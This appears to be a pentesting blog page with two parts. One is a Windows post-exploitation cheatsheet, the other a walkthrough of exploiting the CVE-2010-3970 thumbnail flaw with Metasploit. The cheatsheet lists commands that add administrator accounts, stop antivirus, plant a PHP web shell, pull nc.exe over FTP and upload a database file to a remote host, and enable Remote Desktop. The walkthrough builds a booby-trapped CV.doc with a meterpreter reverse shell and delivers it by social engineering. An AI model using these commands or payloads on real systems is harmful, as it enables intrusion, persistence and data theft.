Manual pentesting cheatsheet (Windows)

This is a list of commands that can be useful when you have a shell on a Windows box and you want to do local discovery, escalate privileges and pivot (without using tools as Metasploit):

View your current user:	whoami
View information about the current user:	net user myuser(for a local user) net user myuser /domain (for a domain user)
View the local groups:	net localgroup
View the local administrators:	net localgroup Administrators
Add a new user:	net user myuser mypass /add
Add a user in the local Administrators group:	net localgroup Administrators myuser /add
View the domain name of current machine:	net config workstation net config server
View the name of the domain controller:	reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
View the list of domain admins:	net group "Domain Admins" /domain
View the list of started services (search for antivirus):	net start sc query
Stop a service:	net stop "Symantec Endpoint Protection"
View the list of started processes and the owner:	tasklist /v
Kill a process by its name	taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown	shutdown /a
Create php backdoor/shell	echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server	echo open 10.1.2.3> C:\script.txt echo user myftpuser>> C:\script.txt echo pass myftppass>> C:\script.txt echo get nc.exe>> C:\script.txt echo bye>> C:\script.txt ftp -s:script.txt
Upload a file to a remote FTP server	echo open 10.1.2.3> C:\script.txt echo user myftpuser>> C:\script.txt echo pass myftppass>> C:\script.txt echo put E:\backups\database.dbf>> C:\script.txt echo bye>> C:\script.txt ftp -s:script.txt
View established connections of current machine:	netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine:	netstat -a -n -p tcp | find "LISTEN" netstat -a -n -p udp
View network configuration:	netsh interface ip show addresses netsh interface ip show route netsh interface ip show neighbors
View current network shares:	net share
Mount a remote share with the rights of the current user:	net use K: \\10.1.2.3\C$ dir K:
Enable Remote Desktop:	reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Update:

A friend pointed me to a more comprehensive list of Windows commands that can be utilized for post-exploitation here. Thanks, Cosmin! 😉

From Windows thumbnails vulnerability to remote shell

Beware of thubnails!

CVE-2010-3970 – Windows Graphics Rendering Engine vulnerability – is still a 0-day (9 January 2011) and the exploit is public.

Exploitation is pretty easy.The victim just needs to view a file like CV.doc in Windows Explorer – thumbnails mode – and the payload gets executed on a fully patched Windows XP SP3 machine.

This thumbnail (CV.doc)executes the Windows calculator:

Exploiting the thumbnail vulnerability CVE-2010-3970

Things can get more serious when the attacker is able to open a meterpreter session with the victim’s machine. This can also be easily accomplished with Metasploit:

1. Creating the malicious thumbnail in msfconsole:

msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
> show options
> set FILENAME CV.doc
> set OUTPUTPATH /root
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit


2. Sending the thumbnail to the victim (e.g. by social engineering attack).

3. Listening for incoming connections on the attacker machine:

msf > use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit


Et voila! The shell we were waiting for…

Meterpreter session open

Until a patch will be provided, Microsoft clients can use the Fix it tool described in this support page.